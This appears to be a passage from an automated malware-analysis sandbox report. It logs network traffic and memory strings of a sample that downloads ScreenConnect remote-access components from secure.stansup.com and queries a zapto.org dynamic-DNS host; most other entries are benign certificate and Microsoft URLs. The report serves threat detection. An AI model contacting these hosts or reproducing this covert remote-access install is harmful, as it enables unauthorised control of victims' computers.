                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: secure.stansup.com
                  Source: global trafficDNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690008650.00000189C642D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000008.00000002.2690157641.00000189C644A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: svchost.exe, 00000007.00000002.2690801617.000001E0EC80F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: khwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digice
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: khwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrust
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000002.00000002.2494183832.000001D4591F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000008.00000002.2690008650.00000189C641B000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?06f0038
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690157641.00000189C644A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a54a317
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu-1.0
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517366863.00000189C5F5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdence
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:S
                  Source: svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABGI2aS3a
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdd
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517366863.00000189C5F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:p
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpC9fPITA
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000008.00000002.2690008650.00000189C641B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689076222.00000189C5683000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690289231.00000189C6487000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689329817.00000189C56EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scon
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
                  Source: svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EB8A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1904297758.0000000001982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.(
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F166000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831972268.000000001B690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806013
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468931306.00000189C5F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 00000007.00000003.1462695690.000001E0ECA00000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
